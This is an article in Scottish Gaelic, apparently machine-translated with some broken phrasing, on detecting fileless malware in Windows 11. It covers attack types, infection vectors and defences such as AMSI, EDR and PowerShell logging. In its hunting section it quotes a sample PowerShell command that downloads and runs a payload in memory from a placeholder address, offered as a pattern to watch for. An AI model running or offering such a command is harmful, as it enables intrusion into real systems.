Mar a lorgas tu malware cunnartach gun fhaidhle ann an Windows 11

¿Ciamar a lorgas tu malware cunnartach gun fhaidhle? Tha gnìomhachd ionnsaigh gun fhaidhle air a dhol am meud gu mòr, agus gus cùisean a dhèanamh nas miosa, Chan eil Windows 11 dìonachBidh an dòigh-obrach seo a’ seachnadh an diosc agus an urra ri cuimhne agus innealan siostaim dligheach; is e sin as coireach gu bheil prògraman antivirus stèidhichte air ainmean-sgrìobhte a’ strì. Ma tha thu a’ coimhead airson dòigh earbsach airson a lorg, tha am freagairt na laighe ann a bhith ga chur còmhla. telemetry, mion-sgrùdadh giùlain, agus smachdan Windows.

Anns an eag-shiostam làithreach, bidh iomairtean a bhios a’ dèanamh ana-cleachdadh air PowerShell, WMI, no Mshta a’ fuireach còmhla ri dòighean nas iom-fhillte leithid stealladh cuimhne, buanachadh “gun a bhith a’ beantainn” ris an diosc, agus eadhon droch-chleachdadh bathar-bogIs e an iuchair tuigse fhaighinn air mapa a’ chunnart, ìrean an ionnsaigh, agus dè na comharran a dh’ fhàgas iad eadhon nuair a thachras a h-uile càil taobh a-staigh RAM.

Dè a th’ ann am malware gun fhaidhle agus carson a tha e na adhbhar dragh ann an Windows 11?

Nuair a bhios sinn a’ bruidhinn mu bhagairtean “gun fhaidhle”, tha sinn a’ toirt iomradh air còd droch-rùnach a tha Chan fheum thu faidhlichean ùra a chur an gnìomh a thasgadh anns an t-siostam faidhle gus obrachadh. Mar as trice, thèid a stealladh a-steach do phròiseasan ruith agus a chur an gnìomh ann an RAM, an urra ri eadar-mhìnearan agus faidhlichean binary air an soidhnigeadh le Microsoft (me, PowerShell, WMI, rundll32, mshtaTha seo a’ lughdachadh do lorg-coise agus a’ leigeil leat einnseanan a sheachnadh nach eil a’ coimhead ach airson faidhlichean amharasach.

Thathas den bheachd gu bheil sgrìobhainnean oifis no PDFan a bhios a’ cleachdadh so-leòntachd gus òrdughan a chuir air bhog nam pàirt den iongantas, leis gu bheil cuir an gnìomh ann an cuimhne gun faidhlichean binary feumail fhàgail airson mion-sgrùdadh. Droch-chleachdadh macra agus DDE Ann an Office, leis gu bheil an còd a’ ruith ann am pròiseasan dligheach mar WinWord.

Bidh luchd-ionnsaigh a’ cothlamadh innleadaireachd shòisealta (phishing, ceanglaichean spama) le ribe teicnigeach: bidh cliog an neach-cleachdaidh a’ tòiseachadh sreath anns am bi sgriobt a’ luchdachadh sìos agus a’ cur an gnìomh an luchd mu dheireadh sa chuimhne, a’ seachnadh lorg fhàgail air an diosg. Tha na h-amasan a’ dol bho ghoid dàta gu cur an gnìomh ransomware, gu gluasad sàmhach taobhach.

Seòrsachaidhean a rèir lorg-coise anns an t-siostam: bho 'fìor-ghlan' gu hibridan

Gus bun-bheachdan troimh-chèile a sheachnadh, tha e feumail bagairtean a sgaradh a rèir an ìre de eadar-obrachadh leis an t-siostam faidhle. Tha an seòrsachadh seo a’ soilleireachadh dè a mhaireas, càite a bheil an còd a’ fuireach, agus dè na comharran a dh’fhàgas e?.

Seòrsa I: gun ghnìomhachd faidhle

Chan eil malware gu tur às aonais faidhlichean a’ sgrìobhadh dad gu diosg. Is e eisimpleir clasaigeach a bhith a’ cleachdadh so-leòntachd lìonra (mar an vectar EternalBlue san àm a dh'fhalbh) gus doras cùil a chur an gnìomh a tha a' fuireach ann an cuimhne an eithne (cùisean mar DoublePulsar). An seo, tha a h-uile càil a' tachairt ann an RAM agus chan eil nithean sam bith anns an t-siostam faidhle.

Is e roghainn eile a th’ ann a bhith a’ truailleadh an firmware de phàirtean: BIOS/UEFI, innealan-atharrachaidh lìonra, innealan USB (dòighean-obrach de sheòrsa BadUSB) no eadhon fo-shiostaman CPU. Bidh iad a’ leantainn tro ath-thòiseachadh agus ath-shuidheachadh, leis an duilgheadas a bharrachd sin Is ann ainneamh a bhios bathar-bog a’ sgrùdadh a’ chompanaidh.Is iad sin ionnsaighean iom-fhillte, nach eil cho tric, ach cunnartach air sgàth cho falaichte ’s a tha iad agus cho seasmhach ’s a tha iad.

Seòrsa II: Gnìomhachd tasglannachaidh neo-dhìreach

An seo, chan eil am malware a’ “fàgail” a ghnìomhaiche fhèin, ach a’ cleachdadh soithichean a tha air an riaghladh leis an t-siostam a tha air an stòradh mar fhaidhlichean. Mar eisimpleir, dorsan cùil a chuireas… òrdughan powershell ann an stòr-dàta WMI agus a chur an gnìomh le sìoltachain tachartais. Tha e comasach a stàladh bhon loidhne-àithne gun faidhlichean binary a leigeil às, ach tha stòr-dàta WMI air diosg mar stòr-dàta dligheach, ga dhèanamh duilich a ghlanadh gun bhuaidh a thoirt air an t-siostam.

Bho shealladh practaigeach thathas den bheachd nach eil faidhle annta, leis gu bheil an soitheach sin (WMI, Clàr, msaa.) Chan e prògram clasaigeach a ghabhas lorg a th’ ann a ghabhas ruith. Agus chan eil a ghlanadh furasta. An toradh: buanachadh falaichte le glè bheag de lorg "traidiseanta".

Seòrsa III: Feumaidh faidhlichean obrachadh

Bidh cuid de chùisean a’ cumail suas buanseasmhachd 'gun fhaidhle' Aig ìre loidsigeach, feumaidh iad brosnachaidh stèidhichte air faidhle. Is e Kovter an eisimpleir àbhaisteach: bidh e a’ clàradh gnìomhair slige airson leudachadh air thuaiream; nuair a thèid faidhle leis an leudachadh sin fhosgladh, thèid sgriobt beag a’ cleachdadh mshta.exe a chuir air bhog, a bhios ag ath-thogail an t-sreang droch-rùnach bhon Chlàr.

Is e an cleas nach eil luchd a ghabhas sgrùdadh anns na faidhlichean "bait" seo le leudachadh air thuaiream, agus gu bheil a’ mhòr-chuid den chòd anns an clàradh (soitheach eile). Sin as coireach gu bheil iad air an seòrsachadh mar gun fhaidhle a thaobh buaidh, eadhon ged a tha iad, gu fìrinneach, an urra ri aon no barrachd nithean diosc mar bhrosnachadh.

Vectaran agus 'aoighean' galair: càite an tèid e a-steach agus càite am bi e a’ falach

Gus lorg a leasachadh, tha e deatamach puing inntrigidh agus aoigh a’ ghalair a mhapadh. Bidh an sealladh seo a’ cuideachadh le bhith a’ dealbhadh smachdan sònraichte Thoir prìomhachas do theilemeatraidh iomchaidh.

cleasan

• Stèidhichte air faidhlichean (Seòrsa III): Faodaidh sgrìobhainnean, faidhlichean ruith-ghnìomhach, faidhlichean Flash/Java dìleab, no faidhlichean LNK brath a ghabhail air a’ bhrabhsair no an einnsean a bhios gan giullachd gus còd-shlige a luchdachadh a-steach don chuimhne. Is e faidhle a’ chiad vectar, ach bidh an luchd a’ siubhal gu RAM.
• Stèidhichte air lìonra (Seòrsa I): Bidh pasgan a bhios a’ gabhail brath air so-leòntachd (m.e., ann an SMB) a’ coileanadh a ghnìomhachaidh anns an fhearann-cleachdaidh no anns an eithne. Rinn WannaCry an dòigh-obrach seo mòr-chòrdte. Luchdaich cuimhne dìreach gun fhaidhle ùr.

Hardware

• Innealan (Seòrsa I): Faodar bathar-bog diosc no cairt lìonra atharrachadh agus còd a thoirt a-steach. Duilich a sgrùdadh agus mairidh e taobh a-muigh an t-siostam obrachaidh.
• Fo-shiostaman CPU agus riaghlaidh (Seòrsa I): Tha teicneòlasan leithid ME/AMT aig Intel air slighean a shealltainn gu Lìonrachadh agus cur an gnìomh taobh a-muigh an OSBidh e a’ toirt ionnsaigh aig ìre glè ìosal, le comas àrd airson falach.
• USB (Seòrsa I): Leigidh BadUSB leat draibh USB ath-phrògramachadh gus meur-chlàr no NIC a phearsanachadh agus òrdughan a chur air bhog no trafaic ath-stiùireadh.
• BIOS / UEFI (Seòrsa I): ath-phrògramadh firmware droch-rùnach (cùisean mar Mebromi) a bhios a’ ruith mus tòisich Windows.
• Hypervisor (Seòrsa I): A’ cur mini-hypervisor an gnìomh fon t-siostam obrachaidh gus a làthaireachd fhalach. Tearc, ach air fhaicinn mu thràth ann an cruth rootkits hypervisor.

Cur an gnìomh agus stealladh

• Stèidhichte air faidhlichean (Seòrsa III): EXE/DLL/LNK no gnìomhan clàraichte a chuireas stealladh a-steach do phròiseasan dligheach.
• macros (Seòrsa III): Faodaidh VBA ann an Office luchdan a dhì-chòdachadh agus a chur an gnìomh, a’ gabhail a-steach ransomware slàn, le cead an neach-cleachdaidh tro mhealladh.
• Sgrìobhainnean (Seòrsa II): PowerShell, VBScript no JScript bhon fhaidhle, loidhne-àithne, seirbheisean, Clàradh no WMIFaodaidh an ionnsaighear an sgriobt a thaipeadh ann an seisean iomallach gun a bhith a’ beantainn ris an diosg.
• Clàr tòiseachaidh (MBR/Boot) (Seòrsa II): Bidh teaghlaichean mar Petya a’ sgrìobhadh thairis air an roinn tòiseachaidh gus smachd a ghabhail aig àm tòiseachaidh. Tha e taobh a-muigh an t-siostaim faidhle, ach ruigsinneach don OS agus fuasglaidhean ùr-nodha as urrainn a thoirt air ais.

Mar a bhios ionnsaighean gun fhaidhle ag obair: ìrean agus comharran

Ged nach fhàg iad faidhlichean so-ghnìomhaichte, bidh na h-iomairtean a’ leantainn loidsig ìreil. Le bhith gan tuigsinn, is urrainn dhuinn sùil a chumail orra. tachartasan agus dàimhean eadar pròiseasan a dh’fhàgas comharra.

• Cothrom tùsailIonnsaighean fiosgaich a’ cleachdadh cheanglaichean no cheanglaichean, làraichean-lìn air an cur an cunnart, no teisteanasan air an goid. Bidh mòran shlabhraidhean a’ tòiseachadh le sgrìobhainn Oifis a bhios a’ piobrachadh àithne PowerShell.
• Buanseasmhachd: dorsan cùil tro WMI (criathragan agus fo-sgrìobhaidhean), Iuchraichean cur an gnìomh clàraidh no gnìomhan clàraichte a bhios ag ath-fhoillseachadh sgriobtaichean gun fhaidhle droch-rùnach ùr.
• Ex-shìoladhCho luath ‘s a bhios am fiosrachadh air a chruinneachadh, thèid a chur a-mach às an lìonra le bhith a’ cleachdadh phròiseasan earbsach (brobhsairean, PowerShell, bitsadmin) gus an trafaic a mheasgachadh.

Tha am pàtran seo gu sònraichte seòlta leis gu bheil an comharran ionnsaigh Bidh iad a’ falach ann an àbhaisteachd: argamaidean loidhne-àithne, slabhraidh phròiseasan, ceanglaichean a-muigh neo-àbhaisteach, no ruigsinneachd gu APIan stealladh.

Dòighean cumanta: bho chuimhne gu clàradh

Tha na cleasaichean an urra ri raon de dòighean a bhios a’ dèanamh cinnteach à falach. Tha e feumail fios a bhith agad air na rudan as cumanta gus lorg èifeachdach a ghnìomhachadh.

• Neach-còmhnaidh ann an cuimhneA’ luchdachadh luchdan a-steach do àite pròiseas earbsach a tha a’ feitheamh ri gnìomhachadh. rootkits agus dubhain Anns a' chridhe, bidh iad ag àrdachadh ìre an fhalach.
• Buanseasmhachd anns a’ ChlàrSàbhail blobaichean crioptaichte ann an iuchraichean agus ath-uisgeachadh iad bho lannsair dligheach (mshta, rundll32, wscript). Faodaidh an stàlaichear sealach fèin-sgrios a dhèanamh gus a lorg-coise a lughdachadh.
• Fiasgaich teisteanasanA’ cleachdadh ainmean-cleachdaiche is faclan-faire a chaidh a ghoid, bidh an t-ionnsaighear a’ cur an gnìomh sligean is lusan iomallach ruigsinneachd shàmhach anns a’ Chlàr no WMI.
• Ransomware 'gun fhaidhle'Tha crioptachadh agus conaltradh C2 air an stiùireadh bho RAM, a’ lughdachadh chothroman airson lorg gus am bi am milleadh ri fhaicinn.
• Pasganan obrachaidhslabhraidhean fèin-ghluasadach a lorgas so-leòntachd agus a chuireas luchdan cuimhne a-mhàin an sàs às deidh don neach-cleachdaidh briogadh.
• Sgrìobhainnean le còdmacros agus uidheaman mar DDE a bhios a’ piobrachadh àitheantan gun faidhlichean a thèid a ruith a shàbhaladh air diosg.

Tha sgrùdaidhean gnìomhachais air ìrean àrda follaiseach a nochdadh mu thràth: ann an aon ùine ann an 2018, àrdachadh de chòrr is 90% ann an ionnsaighean slabhraidh stèidhichte air sgriobtaichean agus PowerShell, comharra gu bheil am vectar air a thaghadh airson a èifeachdas.

An dùbhlan do chompanaidhean agus do sholaraichean: carson nach eil bacadh gu leòr

Bhiodh e tàmailteach PowerShell a dhì-cheadachadh no macros a thoirmeasg gu bràth, ach Bhriseadh tu an obair’S e PowerShell prìomh cholbh rianachd an latha an-diugh agus tha Office riatanach ann an gnìomhachas; gu tric chan eil bacadh dall comasach.

A bharrachd air sin, tha dòighean ann airson smachdan bunaiteach a sheachnadh: PowerShell a ruith tro DLLan agus rundll32, sgriobtaichean a phacaigeadh ann an EXEan, Thoir leat do leth-bhreac fhèin de PowerShell no eadhon sgriobtaichean fhalach ann an ìomhaighean agus an toirt a-mach don chuimhne. Mar sin, chan urrainnear an dìon a stèidheachadh a-mhàin air a bhith a’ diùltadh gu bheil innealan ann.

Is e mearachd chumanta eile a bhith a’ cur a’ cho-dhùnaidh gu lèir chun sgòthan: ma dh’fheumas an riochdaire feitheamh ri freagairt bhon fhrithealaiche, Caillidh tu casg fìor-ùineFaodar dàta teile-mheataireachd a luchdachadh suas gus am fiosrachadh a neartachadh, ach an Feumaidh lasachadh tachairt aig a’ cheann-uidhe.

Mar a lorgas tu malware gun fhaidhle ann an Windows 11: telemetry agus giùlan

Is e an ro-innleachd a bhuannaicheas sùil a chumail air pròiseasan agus cuimhneChan e faidhlichean. Tha giùlan droch-rùnach nas seasmhaiche na cruthan faidhle, agus mar sin tha iad freagarrach airson einnseanan casg.

• AMSI (Eadar-aghaidh Sganaidh Antimalware)Bidh e a’ glacadh sgriobtaichean PowerShell, VBScript, no JScript eadhon nuair a thèid an togail gu daineamaigeach sa chuimhne. Sàr-mhath airson sreangan doilleir a ghlacadh mus tèid an cur an gnìomh.
• Sgrùdadh phròiseasan: toiseach/crìoch, PID, pàrantan is clann, slighean, loidhnichean-àithne agus hashes, a bharrachd air craobhan cur gu bàs gus an sgeulachd slàn a thuigsinn.
• Mion-sgrùdadh cuimhneLorg stealladh, luchdan meòrachail no PE gun a bhith a’ beantainn ris an diosc, agus ath-sgrùdadh air roinnean neo-àbhaisteach a ghabhas cur an gnìomh.
• Dìon roinn tòiseachaidhsmachd agus ath-nuadhachadh an MBR/EFI ma thèid a mhilleadh.

Ann an eag-shiostam Microsoft, bidh Defender for Endpoint a’ cothlamadh AMSI, sgrùdadh giùlainBithear a’ cleachdadh sganadh cuimhne agus ionnsachadh innealan stèidhichte air a’ sgòth gus lorgaidhean a sgèileadh an aghaidh atharrachaidhean ùra no doilleir. Bidh luchd-reic eile a’ cleachdadh dhòighean-obrach coltach ri chèile le einnseanan a tha a’ fuireach san eithne.

Eisimpleir reusanta de cho-dhàimh: bho sgrìobhainn gu PowerShell

Smaoinich air slabhraidh far a bheil Outlook a’ luchdachadh sìos ceanglachan, Word a’ fosgladh an sgrìobhainn, susbaint gnìomhach air a chomasachadh, agus PowerShell air a chur air bhog le paramadairean amharasach. Bhiodh telemetry ceart a’ sealltainn an Loidhne-àithne (m.e., ExecutionPolicy Bypass, uinneag fhalach), a’ ceangal ri àrainn neo-earbsach agus a’ cruthachadh pròiseas pàiste a bhios ga stàladh fhèin ann an AppData.

Tha riochdaire le co-theacsa ionadail comasach air stad agus till air ais gnìomhachd droch-rùnach gun eadar-theachd làimhe, a bharrachd air fios a chur chun SIEM no tro phost-d/SMS. Bidh cuid de thoraidhean a’ cur sreath de bhun-adhbhar ris (modalan de sheòrsa StoryLine), a tha a’ comharrachadh chan ann chun phròiseas faicsinneach (Outlook/Word), ach chun an snàthainn làn droch-rùnach agus a thùs gus an siostam a ghlanadh gu coileanta.

Dh’fhaodadh pàtran àithne àbhaisteach airson a bhith mothachail air a bhith coltach ri seo: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Chan e an sreang cheart a th’ ann an loidsig, ach an seata de chomharran: seach-rathad poileasaidh, uinneag falaichte, luchdachadh sìos soilleir, agus cur an gnìomh sa chuimhne.

AMSI, loidhne-phìoban agus dreuchd gach cleasaiche: bhon cheann-uidhe chun an SOC

A bharrachd air glacadh sgriobtaichean, bidh ailtireachd làidir a’ stiùireadh cheumannan a bhios a’ comasachadh rannsachadh agus freagairt. Mar as motha fianais a bhios ann mus tèid an t-uallach a chur an gnìomh, ’s ann as fheàrr., as fheàrr.

• Eadar-ghabhail sgriobtaBidh AMSI a’ lìbhrigeadh an t-susbaint (fiù mura tèid a chruthachadh air an t-slighe) airson mion-sgrùdadh statach is fiùghantach ann am pìob-loidhne malware.
• Tachartasan pròiseasBithear a’ cruinneachadh PIDan, faidhlichean binary, hashes, slighean, agus dàta eile. argamaidean, a’ stèidheachadh nan craobhan-pròiseis a lean chun luchd mu dheireadh.
• Lorgaireachd agus aithrisThèid na lorgaidhean a thaisbeanadh air consol an toraidh agus an cur air adhart gu àrd-ùrlaran lìonra (NDR) airson lèirsinn iomairt.
• Geallaidhean luchd-cleachdaidhFiù 's ma thèid sgriobt a chur a-steach don chuimhne, bidh am frèam-obrach Bidh AMSI ga ghlacadh ann an dreachan co-chòrdail de Windows.
• Comasan rianairerèiteachadh poileasaidh gus sgrùdadh sgriobtaichean a chomasachadh, bacadh stèidhichte air giùlan agus a’ cruthachadh aithisgean bhon chonsól.
• Obair SOC: toirt a-mach nithean-ealain (VM UUID, dreach OS, seòrsa sgriobt, pròiseas tòiseachaidh agus a phàrant, hashes agus loidhnichean-àithne) gus an eachdraidh ath-chruthachadh agus riaghailtean togail ri teachd.

Nuair a leigeas an àrd-ùrlar às-mhalairt a dhèanamh bufair cuimhne Co-cheangailte ris a’ chur gu bàs, faodaidh luchd-rannsachaidh lorgaidhean ùra a ghineadh agus an dìon an aghaidh atharrachaidhean coltach ris a neartachadh.

Ceumannan practaigeach ann an Windows 11: casg agus sealg

A bharrachd air EDR le sgrùdadh cuimhne agus AMSI, leigidh Windows 11 leat àiteachan ionnsaigh a dhùnadh agus faicsinneachd a leasachadh le smachdan dùthchasach.

• Clàradh agus cuingealachaidhean ann an PowerShellA’ cur an comas Clàradh Blocaichean Sgriobtaichean agus Clàradh Mhodalan, a’ cur modhan cuibhrichte an sàs far a bheil sin comasach, agus a’ cumail smachd air cleachdadh Seachnadh/Falaichte.
• Riaghailtean Lùghdachadh Uachdar Ionnsaigh (ASR): a’ cur bacadh air cur air bhog sgriobtaichean le pròiseasan Oifis agus Droch-chleachdadh WMI/PSExec nuair nach eil feum air.
• Poileasaidhean macro na h-Oifis: a’ cur à comas gu bunaiteach soidhnigeadh macro a-staigh agus liostaichean earbsa teann; a’ cumail sùil air sruthan DDE dìleab.
• Sgrùdadh is Clàradh WMIa’ cumail sùil air fo-sgrìobhaidhean tachartais agus iuchraichean cur gu bàs fèin-ghluasadach (Ruith, RunOnce, Winlogon), a bharrachd air cruthachadh ghnìomhan clàraichte.
• Dìon tòiseachaidh: a’ cur Tòiseachadh Tèarainte an gnìomh, a’ sgrùdadh ionracas MBR/EFI agus a’ dearbhadh nach eil atharrachaidhean sam bith ann aig àm tòiseachaidh.
• Pasgadh agus cruadhachadha’ dùnadh so-leòntachd a ghabhas saothrachadh ann am brobhsairean, co-phàirtean Oifis, agus seirbheisean lìonra.
• Mothachadha’ trèanadh luchd-cleachdaidh agus sgiobaidhean teicnigeach ann am fiosgaich agus comharran cur gu bàs dìomhair.

Airson sealg, cuir fòcas air ceistean mu dheidhinn: cruthachadh phròiseasan le Office a dh’ionnsaigh PowerShell/MSHTA, argamaidean le luchdaich sìos sreang/luchdaich sìos faidhleSgriobtaichean le doilleireachd shoilleir, stealladh meòrachail, agus lìonraidhean a-muigh gu TLDan amharasach. Dèan tar-iomradh air na comharran seo le cliù agus tricead gus fuaim a lughdachadh.

Dè as urrainn do gach einnsean a lorg an-diugh?

Bidh fuasglaidhean iomairt Microsoft a’ cothlamadh AMSI, anailiseachd giùlain, sgrùdadh a dhèanamh air cuimhne agus dìon roinn-bhròg, a bharrachd air modalan ML stèidhichte air a’ sgòth gus sgèileadh an aghaidh bagairtean a tha a’ tighinn am bàrr. Bidh luchd-reic eile a’ cur an gnìomh sgrùdadh aig ìre an eithne gus eadar-dhealachadh a dhèanamh eadar bathar-bog droch-rùnach agus neo-chiontach le bhith a’ tilleadh atharrachaidhean gu fèin-ghluasadach.

Dòigh-obrach stèidhichte air sgeulachdan cur gu bàs Leigidh e leat am freumh-adhbhar aithneachadh (mar eisimpleir, ceangal Outlook a bhrosnaicheas slabhraidh) agus an craoibh gu lèir a lughdachadh: sgriobtaichean, iuchraichean, gnìomhan, agus faidhlichean binary eadar-mheadhanach, a’ seachnadh a bhith steigte air a’ chomharra follaiseach.

Mearachdan cumanta agus mar a sheachnas tu iad

Chan e a-mhàin gu bheil e mì-phractaigeach PowerShell a bhacadh às aonais plana riaghlaidh eile, ach tha cuideachd dòighean air a ghairm gu neo-dhìreachTha an aon rud a’ buntainn ri macraichean: an dàrna cuid bidh thu gan riaghladh le poileasaidhean agus ainmean-sgrìobhte, no bidh a’ ghnìomhachas a’ fulang. Tha e nas fheàrr fòcas a chuir air riaghailtean telemetry agus giùlain.

Is e mearachd chumanta eile a bhith a’ creidsinn gu bheil tagraidhean liosta gheal a’ fuasgladh a h-uile càil: tha teicneòlas gun fhaidhlichean an urra ri seo gu dìreach. aplacaidean earbsachBu chòir don smachd sùil a chumail air na bhios iad a’ dèanamh agus mar a tha iad a’ buntainn, chan ann dìreach a bheil cead aca.

Leis a h-uile rud gu h-àrd, sguir malware gun fhaidhle de bhith na “taibhse” nuair a bhios tu a’ cumail sùil air na tha dha-rìribh cudromach: giùlan, cuimhne agus tùsan de gach cur an gnìomh. Le bhith a’ cothlamadh AMSI, telemetry pròiseas beairteach, smachdan dùthchasach Windows 11, agus sreath EDR le mion-sgrùdadh giùlain, gheibh thu a’ bhuannachd. Cuir ris a’ cho-aontar poileasaidhean reusanta airson macros agus PowerShell, sgrùdadh WMI/Clàr, agus sealg a bheir prìomhachas do loidhnichean-àithne agus craobhan pròiseas, agus tha dìon agad a ghearras na slabhraidhean sin mus dèan iad fuaim.